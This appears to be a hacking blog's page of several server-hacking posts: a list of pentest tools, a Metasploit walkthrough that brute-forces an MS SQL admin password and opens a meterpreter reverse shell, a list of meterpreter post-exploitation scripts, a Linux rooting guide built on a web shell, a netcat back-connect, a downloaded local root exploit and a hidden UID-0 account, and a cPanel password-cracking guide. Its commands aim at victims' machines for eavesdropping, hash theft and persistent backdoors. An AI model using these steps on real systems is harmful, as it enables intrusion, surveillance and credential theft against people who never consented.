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Showing posts with label Server Hacking. Show all posts
Showing posts with label Server Hacking. Show all posts

Saturday 10 January 2015


Here is the List of tools that ethical HACKER must have a range of systems. These tools  are basically to reveal information which further results in a specific attacks on a given system. To locate weaknesses or error in a target system to gain as muchas information as possible about that network.
These tools Contains vulnerability scanning,  real exploits, Denial of Service, buffer overflow attacks and a wide range of networking integrated advanced utilities to perform such tests.

Tools that ethical HACKER must have :


1 – Nmap:

Nmap is used to scan addresses (IPV6 included), This tool is developed to gather a massive amount of information about the victim. It can scan open ports and much more.
This tool includes various scanning techniques e.g TCP connect(), UDP, TCP SYN (half open), Null scan, ACK sweep, Xmas Tree, FIN,  ICMP (ping sweep), ftp proxy (bounce attack), TCP SYN (half open),  IP Protocol, ICMP (ping sweep) and SYN sweep.

2 – Wireshark:

This is very powerful tool for analysis and network troubleshooting. Wireshark is capable to view data from Live networking. It support media formats and hundreds of protocols. It is also used for development and education. Most Unix vendors and Linux supply their own Wireshark packages.

3 – Cain & Able:

This tool is proven it’s self revolutionary in cyber mafia. It is capable of cracking passwords, several password retrieval jobs, routing/analyzing protocols and sniffing networks. Unlikly most of the tools it is just windows-only and is a twist to forensic tools & modern penetration testing.

4 – MetaSploit:

MetaSploit is powerful network analysis and security tool. It is mostly used for penetration attacks because of it’s easily gathering information of victim and clean-interfacing technique.

5 – Ettercap:

It is used for Man in the middle attack (MITM), these attacks are on Local area networks. It sniffs live connections & also got content filtering techniques. It has many features of host analysis and networking while it supports both active and passive dissections of various protocols.

6 – Nessus:

This Tool provides vulnerability analysis of networks, asset profiling, high-speed data discovery and configuration auditing.

7 – Havij:

Havij is most used testing tool for SQL injection and many other injections. It has features of database retrieval,  site’s scanning, password cracking and admin look-up. Basic purpose of it is to find  vulnerable websites and  breeze to hack.

8 – Kismet:

Kismet is 802.11 layer2 sniffer, wireless network detector and intrusion detection system. It supports every wireless card and can work with any appropriate hardware  on raw monitoring (rfmon) mode. Kismet supports plugin that can sniff media such as DECT. It can sniff  802.11a, 802.11n,  802.11b, sniff802.11g and traffic.

9 – BackTrack Linux:

Backtrack is most popular and widely used tool bootable on CD of Linux Distro. It has got a large variety of penetration testing tools, VOIP networks, network attacks and many more testing/attacking of websites and systems. This tool is most user friendly because of its helpful and useful layout.

10 – W3af:

W3af also known as web-focused Metasploit is an extremely flexible, popular, powerful & framework for finding vulnerabilities in exploiting web application. It’s vast features got dozens of exploitation and web assessment plugins.

11 – Encase:

EnCase is computer forensics software mostly used by law enforcement agencies. Because of it’s vast usage and popularity it is forensics in a  a de-facto standard. This tool is being made to gather data from a computer in a forensically sound manner.

12 – Helix:

Helix is bootable Ubuntu CD which contains multiple tools involving file systems, images, cellphones, computers & tied in to sheer power, it is very user friendly.

13 – Acunetix:

Acunetix is Strong tool in website security purpose. It has variety of features for testing a website for various injections. Acunetix WVS basically checks the vulnerabilities of website, either XSS, SQL or other Injection are possible or not.

14 – Burp Suite:

This tool is designed for performing testing regarding security of web applications. It  is an integrated platform and got various tools working togather to make a complete testing process. This tools is also used for exploiting security vulnerabilities & analysis of application attack surface from initial mapping.


The Penetration Test Process

  • Discovery: The process Penetration tests is a Discovery in variety of techniques e.g  scan utilities, databases, Google data & much more to get as much information about the target as possible. These discoveries are basically to reveal sensitive information which further results in a specific attacks on a given system.

  • Enumeration: After discovery of systems and specific networks the next step is to gain as much as information as possible about that network. The diffrence b/w Discovery & Enumeration depends upon state of intrusion. Enumeration task is to get reletive information about username while software and hardware version information are also obtained form it.

  • Vulnerability Identification: This is most important step in penetration testing. In vulnerability identification you have to locate the week spot of target system. To locate weaknesses or error in a target system is must needed because after that you will get to know where to launch an attack.

  • Exploitation and Launching of Attacks: After vulnerability has been located and you have identified the target’s weekspot now it is possible to launch the exploits. The main purpose of launching exploits is to get full access on victims’s system.

  • Denial of Service: This term is known as dDos (Denial of Service). This is used to check the stability of the systems either it is crashed or not. It is good habit to check the strenght or stability of a system, before the real environment attack is being made.

Reporting: This is just for educational purpose. Now after you have completed penetration test it is recomended to get user customized  for technical overview, This includes detailed recommendations, executive summary, identified vulnerabilities & other security ID numbers. These reports may be in various forms i.e pdf, html, xml etc. while every report must be modified by user’s choice.

Saturday 18 January 2014

How to Hack Databases: Cracking SQL Server Passwords & Owning the Server

How to Hack Databases: Cracking SQL Server Passwords 
& Owning the Server

In this tutorial, we'll look at how we can crack the password 
on the system admin (sa) account on the database, install a meterpreter payload through calling the stored procedure xp_cmdshell, and wreak havoc on their system.

Step 1: Start Metasploit

First, we need to start Metasploit. Once we have the 
metasploit command prompt, we need to define which 
module we want to use. 
In past Metasploit tutorials, we've always used exploits, 
but this one is a bit different. Instead, we will use a  
scanner  among the auxiliary modules that enables us
 to brute force 
the sa password. Let's load up mssql_login:

  • use scanner/mssql/mssql_login


As you can see, Metasploit responds by telling us we have successfully loaded this auxiliary 

module. Now let's take a look at the options with this module.

  • show options

Step 2: Set Your Options

In order to run this MS SQL login module, we will need:
  1. A password file,
  2. Set the RHOSTS, and
  3. Determine the number of THREADS we want to run.
BackTrack has a wordlist specially built for MS SQL password hacking with over 57,000 c
ommonly used SQL passwords at /pentest/exploits/fasttrack/bin/wordlist.txt. In this case, 
our target is at, and we will set our THREADS to 20.


Step 3: Brute Force the Database Passwords

Now, we simply need to type exploit and it runs through password list until it finds the password
 for the sa account.
  • exploit
As you can see, after testing over 57,000 passwords (it takes a few minutes, so be patient),
 it found the password on our sa account of "NullByte". Success! Now we have full sysadmin 
privileges on the database that we can hopefully convert to full system sysadmin privileges.


Step 4: Grab the xp__cmdshell

Now that we have full sysadmin (sa) on the MS SQL database, we are going to leverage that
 to full system sysadmin privileges. MS SQL Server has a stored procedure named xp_cmdshell t
hat enables the sa account to gain a system command shell with full system admin rights. If we can i
nvoke that command shell, we may be able to load the payload of our choice on the system and 
own that system.
Metasploit has a exploit module named windows/mssql/mssqlpayload that attempts to do this.
 Let's load it.
  • use windows/mssql/mssql_payload

Now, let's check the options for this exploit:
  • show options
In this case, we will try to load the meterpreter on this system, so let's:
  • set PAYLOAD windows/meterpreter/reverse_tcp
In addition, we need to set the LPORT, the LHOST, the RHOST and the password we
 recovered from the sa account from above, in this case, "NullByte".
Now, simply type exploit and if all is right with the world, we should get a meterpreter prompt.
Success! We have a meterpreter session!



Step 5: Wreak Havoc!

Now that we have the meterpreter on this system thanks to the xp_cmdshell stored procedure, 
we can begin to wreak havoc on this system. Take a look at my list of meterpreter scripts and let's
 try a few.

First, let's turn on the microphone and listen in on the conversations of the sysadmin and anyone
 else in the room. Think of it as installing a bug in the room from the old James Bond 007 movies.

  • meterpreter > run sound_recorder -i 100 -l /etc
This will grab 100 segments of audio of 30 seconds, or about 50 minutes, and save it in the /etc 
directory. Of course, we can record as much audio as we want. We are only limited by hard drive 


Step 6: Grab the Hash

Now, let's grab some passwords so that we can log back back in whenever we please. Remember,
 once we have the admin password, we can login any time with Metasploit's psexec exploit.
  • meterpreter > hashdump

As you can see, we were able to grab the password hashes from the system

We then need to either crack the hashes using John the Ripper,


The Ultimate List of Hacking Scripts for Metasploit's Meterpreter

Please note that new meterpreter scripts are being developed every day. This list attempts to provide you with a complete list of scripts as of this writing. If you find errors or typos, please feel free to post them here, so I will try correct them as soon as humanly possible.

Script Commands with Brief Descriptions

  • arp_scanner.rb - Script for performing an ARP's Scan Discovery.
  • autoroute.rb - Meterpreter session without having to background the current session.
  • checkvm.rb - Script for detecting if target host is a virtual machine.
  • credcollect.rb - Script to harvest credentials found on the host and store them in the database.
  • domain_list_gen.rb - Script for extracting domain admin account list for use.
  • dumplinks.rb - Dumplinks parses .lnk files from a user's recent documents folder and Microsoft Office's Recent documents folder, if present. The .lnk files contain time stamps, file locations, including share names, volume serial #s and more. This info may help you target additional systems.
  • duplicate.rb - Uses a meterpreter session to spawn a new meterpreter session in a different process. A new process allows the session to take "risky" actions that might get the process killed by A/V, giving a meterpreter session to another controller, or start a keylogger on another process.
  • enum_chrome.rb - Script to extract data from a chrome installation.
  • enum_firefox.rb - Script for extracting data from Firefox. enum_logged_on_users.rb - Script for enumerating current logged users and users that have logged in to the system. enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.
  • enum_putty.rb - Enumerates Putty connections.
  • enum_shares.rb - Script for Enumerating shares offered and history of mounted shares.
  • enum_vmware.rb - Enumerates VMware configurations for VMware products.
  • event_manager.rb - Show information about Event Logs on the target system and their configuration.
  • file_collector.rb - Script for searching and downloading files that match a specific pattern.
  • get_application_list.rb - Script for extracting a list of installed applications and their version.
  • getcountermeasure.rb - Script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. Provides also the option to kill the processes of detected products and disable the built-in firewall.
  • get_env.rb - Script for extracting a list of all System and User environment variables.
  • getfilezillacreds.rb - Script for extracting servers and credentials from Filezilla.
  • getgui.rb - Script to enable Windows RDP.
  • get_local_subnets.rb - Get a list of local subnets based on the host's routes.
  • get_pidgen_creds.rb - Script for extracting configured services with username and passwords.
  • gettelnet.rb - Checks to see whether telnet is installed.
  • get_valid_community.rb - Gets a valid community string from SNMP.
  • getvncpw.rb - Gets the VNC password.
  • hashdump.rb - Grabs password hashes from the SAM.
  • hostedit.rb - Script for adding entries in to the Windows Hosts file.
  • keylogrecorder.rb - Script for running keylogger and saving all the keystrokes.
  • killav.rb - Terminates nearly every antivirus software on victim.
  • metsvc.rb - Delete one meterpreter service and start another.
  • migrate - Moves the meterpreter service to another process.
  • multicommand.rb - Script for running multiple commands on Windows 2003, Windows Vistaand Windows XP and Windows 2008 targets.
  • multi_console_command.rb - Script for running multiple console commands on a meterpreter session.
  • multi_meter_inject.rb - Script for injecting a reverce tcp Meterpreter Payload into memory of multiple PIDs, if none is provided a notepad process will be created and a Meterpreter Payload will be injected in to each.
  • multiscript.rb - Script for running multiple scripts on a Meterpreter session.
  • netenum.rb - Script for ping sweeps on Windows 2003, Windows Vista, Windows 2008 and Windows XP targets using native Windows commands.
  • packetrecorder.rb - Script for capturing packets in to a PCAP file.
  • panda2007pavsrv51.rb - This module exploits a privilege escalation vulnerability in Panda Antivirus 2007. Due to insecure permission issues, a local attacker can gain elevated privileges.
  • persistence.rb - Script for creating a persistent backdoor on a target host.
  • pml_driver_config.rb - Exploits a privilege escalation vulnerability in Hewlett-Packard's PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL permission, a local attacker can gain elevated privileges.
  • powerdump.rb - Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry keys. This script requires you to be running as system in order to work properly. This has currently been tested on Server 2008 and Windows 7, which installs PowerShell by default.
  • prefetchtool.rb - Script for extracting information from windows prefetch folder.
  • process_memdump.rb - Script is based on the paper Neurosurgery With Meterpreter.
  • remotewinenum.rb - This script will enumerate windows hosts in the target environment given a username and password or using the credential under which Meterpeter is running using WMI wmic windows native tool.
  • scheduleme.rb - Script for automating the most common scheduling tasks during a pentest. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
  • schelevator.rb - Exploit for Windows Vista/7/2008 Task Scheduler 2.0 Privilege Escalation. This script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
  • schtasksabuse.rb - Meterpreter script for abusing the scheduler service in Windows by scheduling and running a list of command against one or more targets. Using schtasks command to run them as system. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
  • scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.
  • screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.
  • screen_unlock.rb - Script to unlock a windows screen. Needs system privileges to run and known signatures for the target system.
  • screen_dwld.rb - Script that recursively search and download files matching a given pattern.
  • service_manager.rb - Script for managing Windows services.
  • service_permissions_escalate.rb This script attempts to create a service, then searches through a list of existing services to look for insecure file or configuration permissions that will let it replace the executable with a payload. It will then attempt to restart the replaced service to run the payload. If that fails, the next time the service is started (such as on reboot) the attacker will gain elevated privileges.
  • sound_recorder.rb - Script for recording in intervals the sound capture by a target host microphone.
  • srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.
  • uploadexec.rb - Script to upload executable file to host.
  • virtualbox_sysenter_dos - Script to DoS Virtual Box.
  • virusscan_bypass.rb - Script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes.
  • vnc.rb - Meterpreter script for obtaining a quick VNC session.
  • webcam.rb - Script to enable and capture images from the host webcam.
  • win32-sshclient.rb - Script to deploy & run the "plink" commandline ssh-client. Supports only MS-Windows-2k/XP/Vista Hosts.
  • win32-sshserver.rb - Script to deploy and run OpenSSH on the target machine.
  • winbf.rb - Function for checking the password policy of current system. This policy may resemble the policy of other servers in the target environment.
  • winenum.rb - Enumerates Windows system including environment variables, network interfaces, routing, user accounts, etc
  • wmic.rb - Script for running WMIC commands on Windows 2003, Windows Vista and Windows XP and Windows 2008 targets.

Monday 17 December 2012

Server Rooting Tutorial and Adding New Root User

! welcome to a tutorial on how to root a linux server.

This is going to be short,HQ tutorial with pictures included (For better learining)

So let's start with things you will need:

  • 1) Shelled website
  • 2) Local root exploit
  • 3) NetCat

Chapter 1 - Gathering informations

Open up your .php shell on a hacked webserver.
I have mine for an example

Now you need to check what kernel your slave is using...
It should be something like 

Linux 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686

Next thing you wanna do is to look for an local root exploit.
From example provided mine one is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.

Here's the list of exploits

NOTE: If your webserver have 2.6.18 2011 kernel,then you have 0.0001% chances that you will root it,because there's no public exploit for that version.

Chapter 2 - Backconnecting to the server
For this you will need:

1) NetCat
2) Open port (Example. 443 I won't teach how to port forward,use Google if you don't know how!!)

So open your netcat and type:
-l -n -v -p 443
Hit "Enter"

Now it should write "listening on [any] 443 ..."
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".

Now it should connect to your netcat 
I got something like this

Chapter 3 - Downloading exploit and executing it
Now we will need our exploit from Chapter 1
There's 2 way of uploading:

1) Using shell uploader
2) Using 'wget' function (Requires backconnection)

I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (Mine one and go back to your netcat and type:

Now it downloaded out exploit named "" on our server.

If your exploit is downloaded as anyrandomname.c you must compile it
Do do that first download that exploit and then type:

gcc anyrandomname.c -o anyrandomname
And our exploit is compiled. (If you get errors when compiling then find another exploit)
If you downloaded your exploit in zip file type:


Now you should have your exploit (Like mine "2.6.18-164")

If you completed all steps it's time to get root.


chmod 777 yourexploit'sname
With common sense where i typed "yourexploit'sname" you will type your exploit's name.

And one last final step is to run our exploit

To check if you got root type


Mine steps to root

Chapter 4 - Adding root user
Adding new root user is fairly easy
We use this command:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

Command explanations:
Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.

-u 0 -o - Set the value of user id to 0.

-g 0 - Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not created for the user.

root2 - User name of the new user account.NOTE: Change root2 to your desired username.

Now you need to set a password for your username.
Type in next:
passwd Root2

(Root2 is your username)

See an example

[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

To check if you did alright

id root2
(Root2 is your username)
GNY shell -
Google -
NetCat -

So that concluded our rooting tutorial.
I hope that someone will learn from this and that this thread will be bookmarked for generations

       [sorry images link has been expired:(]

Cpanel Hacking/Cracking Tutorial

 Cpanel Hacking/Cracking Tutorial

Today we will Learn CPANEL cracking or Hacking  i.e gaining password for port no 2082 on website first of all we need a cpanel cracking shell on the server because we are going to crack those websites cpanels which are hosted on the shelled server. 
so lets start i am using cpanel.php [download it here]shell for cracking :) we need two things in cracking first one is usernames of the websites that are hosted on the server second is a good password dictonery [Get Passwords List Here]

 in first step :-
 grab the usernames of the websites using command ls /var/mail
 or use the "Grab the usernames from /etc/passwd" option in the shell
press the go button
  we have done from our side
  lets wait and watch ,if we have supplied good passwords then shell will show a message 
   " [~]# cracking success with username "xyz" with password "xyz"   "
  otherwise it will show 
   "[~] Please put some good passwords to crack username "xyz" :( "

  so chances of success depends on password list that we are using in cracking process